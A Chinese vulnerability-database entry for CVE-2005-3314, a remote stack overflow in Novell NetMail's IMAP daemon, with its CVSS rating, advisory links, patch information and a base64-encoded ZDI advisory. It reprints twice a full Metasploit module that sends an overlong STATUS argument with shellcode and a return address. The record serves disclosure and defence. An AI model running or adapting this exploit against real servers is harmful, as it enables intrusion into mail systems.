CVE-2005-3314
CVSS7.5
发布时间 :2005-11-18 17:03:00
修订时间 :2011-08-01 00:00:00
NMCOEPS    

[原文]Stack-based buffer overflow in the IMAP daemon in Novell Netmail 3.5.2 allows remote attackers to execute arbitrary code via "long verb arguments."


[CNNVD]Novell NetMail IMAPD缓冲区溢出漏洞(CNNVD-200511-260)

        Novell NetMail是基于Internet标准消息和安全协议的邮件和日历系统。
        由于没有正确的过滤用户输入,Novell NetMail的IMAPD中存在缓冲区溢出漏洞,可能允许攻击者远程执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3314
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3314
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-260
(官方数据源) CNNVD

- 其它链接及资源

http://www.zerodayinitiative.com/advisories/ZDI-05-003.html
(VENDOR_ADVISORY)  MISC  http://www.zerodayinitiative.com/advisories/ZDI-05-003.html
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972673.htm
(PATCH)  CONFIRM  http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972673.htm
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972672.htm
(PATCH)  CONFIRM  http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972672.htm
http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972665.htm
(PATCH)  CONFIRM  http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972665.htm
http://xforce.iss.net/xforce/xfdb/23114
(UNKNOWN)  XF  netmail-imap-multiple-bo(23114)
http://www.vupen.com/english/advisories/2005/2494
(VENDOR_ADVISORY)  VUPEN  ADV-2005-2494
http://www.securityfocus.com/bid/15491
(UNKNOWN)  BID  15491
http://www.osvdb.org/20956
(UNKNOWN)  OSVDB  20956
http://securitytracker.com/id?1015240
(UNKNOWN)  SECTRACK  1015240
http://secunia.com/advisories/17641
(VENDOR_ADVISORY)  SECUNIA  17641

- 漏洞信息

Novell NetMail IMAPD缓冲区溢出漏洞
高危 缓冲区溢出
2005-11-18 00:00:00 2006-06-12 00:00:00
远程  
        Novell NetMail是基于Internet标准消息和安全协议的邮件和日历系统。
        由于没有正确的过滤用户输入,Novell NetMail的IMAPD中存在缓冲区溢出漏洞,可能允许攻击者远程执行任意代码。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://support.novell.com/security-alerts

- 漏洞信息 (16483)

Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow (EDBID:16483)
windows remote
2010-05-09 Verified
0 metasploit
N/A [点击下载]
##
# $Id: novell_netmail_status.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP STATUS
				verb. By sending an overly long string, an attacker can overwrite the
				buffer and control program execution.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2005-3314' ],
					[ 'OSVDB', '20956' ],
					[ 'BID', '15491' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 SP0-SP4 English',   { 'Ret' => 0x75022ac4 }],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Nov 18 2005'))

	end

	def exploit
		sploit =  "a002 STATUS " + rand_text_english(1602) + payload.encoded
		sploit << "\xeb\x06" + rand_text_english(2) + [target.ret].pack('V')
		sploit <<  [0xe8, -485].pack('CV') + rand_text_english(150) + " inbox"

		info = connect_login

		if (info == true)
			print_status("Trying target #{target.name}...")
			sock.put(sploit + "\r\n")
		else
			print_status("Not falling through with exploit")
		end

		handler
		disconnect
	end
end
		

- 漏洞信息 (F83168)

Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow (PacketStormID:F83168)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,imap
CVE-2005-3314
[点击下载]

This Metasploit module exploits a stack overflow in Novell's Netmail 3.52 IMAP STATUS verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in Novell's Netmail 3.52 IMAP STATUS
				verb. By sending an overly long string, an attacker can overwrite the 
				buffer and control program execution. 
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-3314' ],
					[ 'OSVDB', '20956' ],
					[ 'BID', '15491' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['Windows 2000 SP0-SP4 English',   { 'Ret' => 0x75022ac4 }], 
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Nov 18 2005'))

	end
	
	def exploit
		sploit =  "a002 STATUS " + rand_text_english(1602) + payload.encoded  
		sploit << "\xeb\x06" + rand_text_english(2) + [target.ret].pack('V')  
		sploit <<  [0xe8, -485].pack('CV') + rand_text_english(150) + " inbox" 

		info = connect_login 
		
		if (info == true)
			print_status("Trying target #{target.name}...")
			sock.put(sploit + "\r\n")
		else
			print_status("Not falling through with exploit")	
		end
		
		handler
		disconnect
	end
end
    

- 漏洞信息 (F41706)

Zero Day Initiative Advisory 05-03 (PacketStormID:F41706)
2005-11-20 00:00:00
Tipping Point,Sebastian Apelt  zerodayinitiative.com
advisory,remote,overflow,arbitrary
CVE-2005-3314
[点击下载]

ZDI-05-003: Novell Netmail IMAPD suffers from buffer overflows. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell Netmail. Authentication is required to exploit this vulnerability. Affected Products: Novell Netmail 3.5.2.

This is a multipart message in MIME format.
--=_alternative 006348FA882570BD_=
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: base64

WkRJLTA1LTAwMyAtIE5vdmVsbCBOZXRNYWlsIElNQVBEIEJ1ZmZlciBPdmVyZmxvd3MNCmh0dHA6
Ly93d3cuemVyb2RheWluaXRpYXRpdmUuY29tL2Fkdmlzb3JpZXMvWkRJLTA1LTAwMy5odG1sDQpO
b3ZlbWJlciAxOHRoLCAyMDA1DQoNCkNWRSBJRDogQ0FOLTIwMDUtMzMxNCANCg0KQWZmZWN0ZWQg
VmVuZG9yOg0KIC0gTm92ZWxsDQoNCkFmZmVjdGVkIFByb2R1Y3RzOg0KIC0gTm92ZWxsIE5ldG1h
aWwgMy41LjIgDQoNClRpcHBpbmdQb2ludFRNIElQUyBDdXN0b21lciBQcm90ZWN0aW9uOg0KVGlw
cGluZ1BvaW50IElQUyBjdXN0b21lcnMgaGF2ZSBiZWVuIHByb3RlY3RlZCBhZ2FpbnN0IHRoaXMg
dnVsbmVyYWJpbGl0eSANCnNpbmNlIE9jdG9iZXIgMjR0aCwgMjAwNSBieSBEaWdpdGFsIFZhY2Np
bmUgcHJvdGVjdGlvbiBmaWx0ZXIgSUQgMzg2OC4gRm9yIA0KZnVydGhlciBwcm9kdWN0IGluZm9y
bWF0aW9uIG9uIHRoZSBUaXBwaW5nUG9pbnQgSVBTOiANCiAgICB3d3cudGlwcGluZ3BvaW50LmNv
bQ0KIA0KVnVsbmVyYWJpbGl0eSBEZXRhaWxzOg0KVGhpcyB2dWxuZXJhYmlsaXR5IGFsbG93cyBy
ZW1vdGUgYXR0YWNrZXJzIHRvIGV4ZWN1dGUgYXJiaXRyYXJ5IGNvZGUgb24gDQp2dWxuZXJhYmxl
IGluc3RhbGxhdGlvbnMgb2YgTm92ZWxsIE5ldG1haWwuIEF1dGhlbnRpY2F0aW9uIGlzIHJlcXVp
cmVkIHRvIA0KZXhwbG9pdCB0aGlzIHZ1bG5lcmFiaWxpdHkuIA0KDQpUaGlzIHNwZWNpZmljIGZs
YXcgZXhpc3RzIHdpdGhpbiB0aGUgSU1BUCBkYWVtb24uIEEgbGFjayBvZiBib3VuZHMgDQpjaGVj
a2luZyBkdXJpbmcgdGhlIHBhcnNpbmcgb2YgbG9uZyB2ZXJiIGFyZ3VtZW50cyByZXN1bHRzIGlu
IGFuIA0KZXhwbG9pdGFibGUgc3RhY2stYmFzZWQgb3ZlcmZsb3cuIA0KDQpWZW5kb3IgUmVzcG9u
c2U6DQoiTm92ZWxsIGhhcyBpc3N1ZWQgYSB1cGRhdGUgZm9yIHRoZSB2dWxuZXJhYmlsaXR5KGll
cykgYW5kIHRoZSB1cGRhdGUgaXMgDQphdmFpbGFibGUgYXQ6IiANCiAgICBzdXBwb3J0Lm5vdmVs
bC5jb20vZmlsZWZpbmRlci8xOTM1Ny9iZXRhLmh0bWwgDQoNCkRpc2Nsb3N1cmUgVGltZWxpbmU6
DQoyMDA1LjEwLjI0IOKAkyBWdWxuZXJhYmlsaXR5IHJlcG9ydGVkIHRvIHZlbmRvcg0KMjAwNS4x
MC4yNCDigJMgRGlnaXRhbCBWYWNjaW5lIHJlbGVhc2VkIHRvIFRpcHBpbmdQb2ludCBjdXN0b21l
cnMNCjIwMDUuMTEuMTcg4oCTIFZ1bG5lcmFiaWxpdHkgaW5mb3JtYXRpb24gcHJvdmlkZWQgdG8g
WkRJIHNlY3VyaXR5IHBhcnRuZXJzDQoyMDA1LjExLjE4IOKAkyBDb29yZGluYXRlZCBwdWJsaWMg
cmVsZWFzZSBvZiBhZHZpc29yeQ0KDQpDcmVkaXQ6DQpUaGlzIHZ1bG5lcmFiaWxpdHkgd2FzIGRp
c2NvdmVyZWQgYnkgU2ViYXN0aWFuIEFwZWx0LiANCg0KQWJvdXQgdGhlIFplcm8gRGF5IEluaXRp
YXRpdmUgKFpESSk6DQpFc3RhYmxpc2hlZCBieSBUaXBwaW5nUG9pbnQsIGEgZGl2aXNpb24gb2Yg
M0NvbSwgVGhlIFplcm8gRGF5IEluaXRpYXRpdmUgDQooWkRJKSByZXByZXNlbnRzIGEgYmVzdC1v
Zi1icmVlZCBtb2RlbCBmb3IgcmV3YXJkaW5nIHNlY3VyaXR5IHJlc2VhcmNoZXJzIA0KZm9yIHJl
c3BvbnNpYmx5IGRpc2Nsb3NpbmcgZGlzY292ZXJlZCB2dWxuZXJhYmlsaXRpZXMuIA0KDQpSZXNl
YXJjaGVycyBpbnRlcmVzdGVkIGluIGdldHRpbmcgcGFpZCBmb3IgdGhlaXIgc2VjdXJpdHkgcmVz
ZWFyY2ggdGhyb3VnaCANCnRoZSBaREkgY2FuIGZpbmQgbW9yZSBpbmZvcm1hdGlvbiBhbmQgc2ln
bi11cCBhdDogDQogICAgd3d3Lnplcm9kYXlpbml0aWF0aXZlLmNvbSANCg0KVGhlIFpESSBpcyB1
bmlxdWUgaW4gaG93IHRoZSBhY3F1aXJlZCB2dWxuZXJhYmlsaXR5IGluZm9ybWF0aW9uIGlzIHVz
ZWQuIA0KM0NvbSBkb2VzIG5vdCByZS1zZWxsIHRoZSB2dWxuZXJhYmlsaXR5IGRldGFpbHMgb3Ig
YW55IGV4cGxvaXQgY29kZS4gDQpJbnN0ZWFkLCB1cG9uIG5vdGlmeWluZyB0aGUgYWZmZWN0ZWQg
cHJvZHVjdCB2ZW5kb3IsIDNDb20gcHJvdmlkZXMgaXRzIA0KY3VzdG9tZXJzIHdpdGggemVybyBk
YXkgcHJvdGVjdGlvbiB0aHJvdWdoIGl0cyBpbnRydXNpb24gcHJldmVudGlvbiANCnRlY2hub2xv
Z3kuIEV4cGxpY2l0IGRldGFpbHMgcmVnYXJkaW5nIHRoZSBzcGVjaWZpY3Mgb2YgdGhlIHZ1bG5l
cmFiaWxpdHkgDQphcmUgbm90IGV4cG9zZWQgdG8gYW55IHBhcnRpZXMgdW50aWwgYW4gb2ZmaWNp
YWwgdmVuZG9yIHBhdGNoIGlzIHB1YmxpY2x5IA0KYXZhaWxhYmxlLiBGdXJ0aGVybW9yZSwgd2l0
aCB0aGUgYWx0cnVpc3RpYyBhaW0gb2YgaGVscGluZyB0byBzZWN1cmUgYSANCmJyb2FkZXIgdXNl
ciBiYXNlLCAzQ29tIHByb3ZpZGVzIHRoaXMgdnVsbmVyYWJpbGl0eSBpbmZvcm1hdGlvbiANCmNv
bmZpZGVudGlhbGx5IHRvIHNlY3VyaXR5IHZlbmRvcnMgKGluY2x1ZGluZyBjb21wZXRpdG9ycykg
d2hvIGhhdmUgYSANCnZ1bG5lcmFiaWxpdHkgcHJvdGVjdGlvbiBvciBtaXRpZ2F0aW9uIHByb2R1
Y3QuIA0K
--=_alternative 006348FA882570BD_=
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: base64

DQo8YnI+PGZvbnQgc2l6ZT0yIGZhY2U9InNhbnMtc2VyaWYiPlpESS0wNS0wMDMgLSBOb3ZlbGwg
TmV0TWFpbCBJTUFQRCBCdWZmZXINCk92ZXJmbG93czwvZm9udD4NCjxicj48Zm9udCBzaXplPTIg
ZmFjZT0ic2Fucy1zZXJpZiI+aHR0cDovL3d3dy56ZXJvZGF5aW5pdGlhdGl2ZS5jb20vYWR2aXNv
cmllcy9aREktMDUtMDAzLmh0bWw8L2ZvbnQ+DQo8YnI+PGZvbnQgc2l6ZT0yIGZhY2U9InNhbnMt
c2VyaWYiPk5vdmVtYmVyIDE4dGgsIDIwMDU8L2ZvbnQ+DQo8YnI+DQo8YnI+PGZvbnQgc2l6ZT0y
IGZhY2U9InNhbnMtc2VyaWYiPkNWRSBJRDogQ0FOLTIwMDUtMzMxNCA8L2ZvbnQ+DQo8YnI+DQo8
YnI+PGZvbnQgc2l6ZT0yIGZhY2U9InNhbnMtc2VyaWYiPkFmZmVjdGVkIFZlbmRvcjo8L2ZvbnQ+
DQo8YnI+PGZvbnQgc2l6ZT0yIGZhY2U9InNhbnMtc2VyaWYiPiZuYnNwOy0gTm92ZWxsPC9mb250
Pg0KPGJyPg0KPGJyPjxmb250IHNpemU9MiBmYWNlPSJzYW5zLXNlcmlmIj5BZmZlY3RlZCBQcm9k
dWN0czo8L2ZvbnQ+DQo8YnI+PGZvbnQgc2l6ZT0yIGZhY2U9InNhbnMtc2VyaWYiPiZuYnNwOy0g
Tm92ZWxsIE5ldG1haWwgMy41LjIgPC9mb250Pg0KPGJyPg0KPGJyPjxmb250IHNpemU9MiBmYWNl
PSJzYW5zLXNlcmlmIj5UaXBwaW5nUG9pbnRUTSBJUFMgQ3VzdG9tZXIgUHJvdGVjdGlvbjo8L2Zv
bnQ+DQo8YnI+PGZvbnQgc2l6ZT0yIGZhY2U9InNhbnMtc2VyaWYiPlRpcHBpbmdQb2ludCBJUFMg
Y3VzdG9tZXJzIGhhdmUgYmVlbg0KcHJvdGVjdGVkIGFnYWluc3QgdGhpcyB2dWxuZXJhYmlsaXR5
IHNpbmNlIE9jdG9iZXIgMjR0aCwgMjAwNSBieSBEaWdpdGFsDQpWYWNjaW5lIHByb3RlY3Rpb24g
ZmlsdGVyIElEIDM4NjguIEZvciBmdXJ0aGVyIHByb2R1Y3QgaW5mb3JtYXRpb24gb24gdGhlDQpU
aXBwaW5nUG9pbnQgSVBTOiA8L2ZvbnQ+DQo8YnI+PGZvbnQgc2l6ZT0yIGZhY2U9InNhbnMtc2Vy
aWYiPiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwO3d3dy50aXBwaW5ncG9pbnQuY29tPC9mb250Pg0K
PGJyPjxmb250IHNpemU9MiBmYWNlPSJzYW5zLXNlcmlmIj4mbmJzcDs8L2ZvbnQ+DQo8YnI+PGZv
bnQgc2l6ZT0yIGZhY2U9InNhbnMtc2VyaWYiPlZ1bG5lcmFiaWxpdHkgRGV0YWlsczo8L2ZvbnQ+
DQo8YnI+PGZvbnQgc2l6ZT0yIGZhY2U9InNhbnMtc2VyaWYiPlRoaXMgdnVsbmVyYWJpbGl0eSBh
bGxvd3MgcmVtb3RlIGF0dGFja2Vycw0KdG8gZXhlY3V0ZSBhcmJpdHJhcnkgY29kZSBvbiB2dWxu
ZXJhYmxlIGluc3RhbGxhdGlvbnMgb2YgTm92ZWxsIE5ldG1haWwuDQpBdXRoZW50aWNhdGlvbiBp
cyByZXF1aXJlZCB0byBleHBsb2l0IHRoaXMgdnVsbmVyYWJpbGl0eS4gPC9mb250Pg0KPGJyPg0K
PGJyPjxmb250IHNpemU9MiBmYWNlPSJzYW5zLXNlcmlmIj5UaGlzIHNwZWNpZmljIGZsYXcgZXhp
c3RzIHdpdGhpbiB0aGUNCklNQVAgZGFlbW9uLiBBIGxhY2sgb2YgYm91bmRzIGNoZWNraW5nIGR1
cmluZyB0aGUgcGFyc2luZyBvZiBsb25nIHZlcmINCmFyZ3VtZW50cyByZXN1bHRzIGluIGFuIGV4
cGxvaXRhYmxlIHN0YWNrLWJhc2VkIG92ZXJmbG93LiA8L2ZvbnQ+DQo8YnI+DQo8YnI+PGZvbnQg
c2l6ZT0yIGZhY2U9InNhbnMtc2VyaWYiPlZlbmRvciBSZXNwb25zZTo8L2ZvbnQ+DQo8YnI+PGZv
bnQgc2l6ZT0yIGZhY2U9InNhbnMtc2VyaWYiPiZxdW90O05vdmVsbCBoYXMgaXNzdWVkIGEgdXBk
YXRlIGZvcg0KdGhlIHZ1bG5lcmFiaWxpdHkoaWVzKSBhbmQgdGhlIHVwZGF0ZSBpcyBhdmFpbGFi
bGUgYXQ6JnF1b3Q7IDwvZm9udD4NCjxicj48Zm9udCBzaXplPTIgZmFjZT0ic2Fucy1zZXJpZiI+
Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7c3VwcG9ydC5ub3ZlbGwuY29tL2ZpbGVmaW5kZXIvMTkz
NTcvYmV0YS5odG1sDQo8L2ZvbnQ+DQo8YnI+DQo8YnI+PGZvbnQgc2l6ZT0yIGZhY2U9InNhbnMt
c2VyaWYiPkRpc2Nsb3N1cmUgVGltZWxpbmU6PC9mb250Pg0KPGJyPjxmb250IHNpemU9MiBmYWNl
PSJzYW5zLXNlcmlmIj4yMDA1LjEwLjI0IOKAkyBWdWxuZXJhYmlsaXR5IHJlcG9ydGVkDQp0byB2
ZW5kb3I8L2ZvbnQ+DQo8YnI+PGZvbnQgc2l6ZT0yIGZhY2U9InNhbnMtc2VyaWYiPjIwMDUuMTAu
MjQg4oCTIERpZ2l0YWwgVmFjY2luZSByZWxlYXNlZA0KdG8gVGlwcGluZ1BvaW50IGN1c3RvbWVy
czwvZm9udD4NCjxicj48Zm9udCBzaXplPTIgZmFjZT0ic2Fucy1zZXJpZiI+MjAwNS4xMS4xNyDi
gJMgVnVsbmVyYWJpbGl0eSBpbmZvcm1hdGlvbg0KcHJvdmlkZWQgdG8gWkRJIHNlY3VyaXR5IHBh
cnRuZXJzPC9mb250Pg0KPGJyPjxmb250IHNpemU9MiBmYWNlPSJzYW5zLXNlcmlmIj4yMDA1LjEx
LjE4IOKAkyBDb29yZGluYXRlZCBwdWJsaWMgcmVsZWFzZQ0Kb2YgYWR2aXNvcnk8L2ZvbnQ+DQo8
YnI+DQo8YnI+PGZvbnQgc2l6ZT0yIGZhY2U9InNhbnMtc2VyaWYiPkNyZWRpdDo8L2ZvbnQ+DQo8
YnI+PGZvbnQgc2l6ZT0yIGZhY2U9InNhbnMtc2VyaWYiPlRoaXMgdnVsbmVyYWJpbGl0eSB3YXMg
ZGlzY292ZXJlZCBieQ0KU2ViYXN0aWFuIEFwZWx0LiA8L2ZvbnQ+DQo8YnI+DQo8YnI+PGZvbnQg
c2l6ZT0yIGZhY2U9InNhbnMtc2VyaWYiPkFib3V0IHRoZSBaZXJvIERheSBJbml0aWF0aXZlICha
REkpOjwvZm9udD4NCjxicj48Zm9udCBzaXplPTIgZmFjZT0ic2Fucy1zZXJpZiI+RXN0YWJsaXNo
ZWQgYnkgVGlwcGluZ1BvaW50LCBhIGRpdmlzaW9uDQpvZiAzQ29tLCBUaGUgWmVybyBEYXkgSW5p
dGlhdGl2ZSAoWkRJKSByZXByZXNlbnRzIGEgYmVzdC1vZi1icmVlZCBtb2RlbA0KZm9yIHJld2Fy
ZGluZyBzZWN1cml0eSByZXNlYXJjaGVycyBmb3IgcmVzcG9uc2libHkgZGlzY2xvc2luZyBkaXNj
b3ZlcmVkDQp2dWxuZXJhYmlsaXRpZXMuIDwvZm9udD4NCjxicj4NCjxicj48Zm9udCBzaXplPTIg
ZmFjZT0ic2Fucy1zZXJpZiI+UmVzZWFyY2hlcnMgaW50ZXJlc3RlZCBpbiBnZXR0aW5nIHBhaWQN
CmZvciB0aGVpciBzZWN1cml0eSByZXNlYXJjaCB0aHJvdWdoIHRoZSBaREkgY2FuIGZpbmQgbW9y
ZSBpbmZvcm1hdGlvbiBhbmQNCnNpZ24tdXAgYXQ6IDwvZm9udD4NCjxicj48Zm9udCBzaXplPTIg
ZmFjZT0ic2Fucy1zZXJpZiI+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7d3d3Lnplcm9kYXlpbml0
aWF0aXZlLmNvbQ0KPC9mb250Pg0KPGJyPg0KPGJyPjxmb250IHNpemU9MiBmYWNlPSJzYW5zLXNl
cmlmIj5UaGUgWkRJIGlzIHVuaXF1ZSBpbiBob3cgdGhlIGFjcXVpcmVkDQp2dWxuZXJhYmlsaXR5
IGluZm9ybWF0aW9uIGlzIHVzZWQuIDNDb20gZG9lcyBub3QgcmUtc2VsbCB0aGUgdnVsbmVyYWJp
bGl0eQ0KZGV0YWlscyBvciBhbnkgZXhwbG9pdCBjb2RlLiBJbnN0ZWFkLCB1cG9uIG5vdGlmeWlu
ZyB0aGUgYWZmZWN0ZWQgcHJvZHVjdA0KdmVuZG9yLCAzQ29tIHByb3ZpZGVzIGl0cyBjdXN0b21l
cnMgd2l0aCB6ZXJvIGRheSBwcm90ZWN0aW9uIHRocm91Z2ggaXRzDQppbnRydXNpb24gcHJldmVu
dGlvbiB0ZWNobm9sb2d5LiBFeHBsaWNpdCBkZXRhaWxzIHJlZ2FyZGluZyB0aGUgc3BlY2lmaWNz
DQpvZiB0aGUgdnVsbmVyYWJpbGl0eSBhcmUgbm90IGV4cG9zZWQgdG8gYW55IHBhcnRpZXMgdW50
aWwgYW4gb2ZmaWNpYWwgdmVuZG9yDQpwYXRjaCBpcyBwdWJsaWNseSBhdmFpbGFibGUuIEZ1cnRo
ZXJtb3JlLCB3aXRoIHRoZSBhbHRydWlzdGljIGFpbSBvZiBoZWxwaW5nDQp0byBzZWN1cmUgYSBi
cm9hZGVyIHVzZXIgYmFzZSwgM0NvbSBwcm92aWRlcyB0aGlzIHZ1bG5lcmFiaWxpdHkgaW5mb3Jt
YXRpb24NCmNvbmZpZGVudGlhbGx5IHRvIHNlY3VyaXR5IHZlbmRvcnMgKGluY2x1ZGluZyBjb21w
ZXRpdG9ycykgd2hvIGhhdmUgYSB2dWxuZXJhYmlsaXR5DQpwcm90ZWN0aW9uIG9yIG1pdGlnYXRp
b24gcHJvZHVjdC4gPC9mb250Pg0K
--=_alternative 006348FA882570BD_=--
    

- 漏洞信息

20956
Novell NetMail IMAP Service Verb Argument Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Private, Exploit Commercial

- 漏洞描述

A remote overflow exists in Novell NetMail. The IMAP service fails to perform proper bounds checking resulting in a stack-based buffer overflow. With a specially crafted request containing an overly long verb argument, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-11-18 2005-10-24
2005-11-17 Unknow

- 解决方案

Upgrade to version 3.52e or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Novell NetMail IMAP Unspecified Buffer Overflow Vulnerability
Boundary Condition Error 15491
Yes No
2005-11-18 12:00:00 2008-02-01 05:38:00
Discovered by Sebastian Apelt.

- 受影响的程序版本

Novell NetMail 3.52 D

- 漏洞讨论

Novell NetMail is prone to a buffer-overflow vulnerability in an unspecified IMAP command. Successful exploits may result in a denial of service or arbitrary code execution.

NetMail 3.52D is affected, but earlier versions may also be vulnerable.

Details regarding the precise nature of this vulnerability are not currently available. We will update this BID as more information emerges.

- 漏洞利用

The following exploit code is available as a module for the Metasploit Framework:

- 解决方案

Novell has released fixes to address this issue.


Novell NetMail 3.52 D

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站